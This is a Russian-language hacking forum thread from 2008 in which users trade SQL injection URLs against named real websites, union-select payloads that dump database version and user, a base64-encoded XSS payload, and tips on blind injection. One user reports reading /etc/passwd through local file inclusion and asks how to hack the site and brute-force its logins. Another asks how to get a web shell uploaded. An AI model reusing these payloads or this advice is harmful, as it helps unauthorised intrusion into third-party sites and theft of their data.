Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),6,7,8,9/*
     
  2. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    сёравно @localhost
     
  3. TehRn

    TehRn New Member

    Joined:
    8 Jul 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    vbulletin 3.7.1

    Помогите разобраться как использовать данную XSS заранее спс.
     
    #2903 TehRn, 11 Aug 2008
    Last edited: 11 Aug 2008
  4. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    2TehRn собственно ф чем проблема то ?
    "PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" Это не что иное как закодированный base64 "<script>alert('XSS')</script>" ;) собтвенно кодируй то что нужно в base и вставляй это пассивная xss на форуме оч многа написанно по этой теме читай ;)
     
  5. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,080
    Likes Received:
    456
    Reputations:
    38
    Подобрал количество полей. всё гуд, ошибки нету, но и ничего не выводит. где трабл?
     
    #2905 mr.The, 11 Aug 2008
    Last edited: 11 Aug 2008
  6. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    2mr.The если мне зрение не изменяет тама нету полей для вывода один выход слепая иньекция ;)
     
  7. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,080
    Likes Received:
    456
    Reputations:
    38
    2MaSTeR GэN
    и на том спасибо. а я думал туплю где-т
     
  8. Girsoft

    Girsoft New Member

    Joined:
    22 Jan 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    подцепил локальным инклудом файлы

    /etc/passwd
    etc/httpd/conf/httpd.conf

    нашёл файл
    phpinfo.php

    из httpd.conf видно, что на хостинге есть ещё сайты. такая запись:



    но приинклудить из них ничего не получается. видимо, такие настройки.

    логов не нашёл =/
    Загружать никаких файлов туда нельзя.

    что мне можно сделать, чтобы хакнуть этот сайт?

    По поводу /etc/passwd, знаю что брутят по маске Логин:Логин фтп, ссх. Скажите пожалуйста, какими брутфорсами это можно провернуть, кроме Гидры, не дружу с ней.
     
  9. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    )

    такого сайта нет вот и не получается проинклудить SITENAME.com )
     
    1 person likes this.
  10. Girsoft

    Girsoft New Member

    Joined:
    22 Jan 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    нет нет. Это я изменил имя, дабы не светить сервер
     
  11. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),database(),password(0),user()))),6, 7,8,9/* кто знает как тут нарыть удалённый адрес для БД + можно там файлы посмотреть через иньекцию
     
  12. AARON

    AARON Elder - Старейшина

    Joined:
    29 Apr 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    1
    Не знал куда написать. Решил сюда.
    Проблема с заливкой шелла. Шелл на holm.ru, но там есть пхп, поэтому он исполняется, а некопируется... Пробовал в .htaccess прописать AddType application/force-open .php - не помогло, как видите... на холме открывается загрузка файла, на сайте с инклюдом - каракули... Подскажите что путевое в htaccess прописать чтоб пахало :)
     
  13. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    help:
    http://www.world-art.ru/games/games.php?id=4575+or+1=1
    есть иньекция ?
    http://www.litprom.ru/text.phtml?storycode=1'
     
    #2913 sabe, 12 Aug 2008
    Last edited: 12 Aug 2008
  14. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359'
    http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359
    http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359+order+by+5--
    http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359+union+select+1,2,3,4,5--
    инъекция есть, но с раскруткой проблемы. подскажет кто?
     
  15. base

    base Member

    Joined:
    20 Jun 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    -10
    инъекта нет
    блинд скул
    инъект есть, вывода нет
    читай Blind Sql Inj
     
    1 person likes this.
  16. Glazz

    Glazz Elder - Старейшина

    Joined:
    9 Aug 2008
    Messages:
    116
    Likes Received:
    7
    Reputations:
    0
    Я не уверен, но разве в SQL инъекции когда подбирают кол-во полей , ставят or 1=1?
     
  17. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Glazz
    это определение.. )

    base
    наверно ты прав.. )

    логический вывод - 5 версия, как получить вывод ?
     
  18. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    А не проще на народе какой-нить аккаунт, специально для шеллов и подобного создать?
     
  19. none222

    none222 Guest

    Reputations:
    0
    http://www.world-art.ru/games/games.php?id=4575+or+1=1
    инъекции НЕТ!

    есть:
    http://www.litprom.ru/text.phtml?storycode=1'
    но слепая: http://www.litprom.ru/text.phtml?storycode=20+union+select+1
    логическая ошибка
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

    проходит фильтрацию. если число больше или меньше допустимого - выводится страница с ошибкой. Если нормальное (именно первое число, без остального запроса), то отправляется к БД, но уже с остальным запросом
     
    1 person likes this.
  20. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    я дето слышал что через иньекцию мона посмотреть какие папки на сервере мона такое очуществить и как?
     
Thread Status:
Not open for further replies.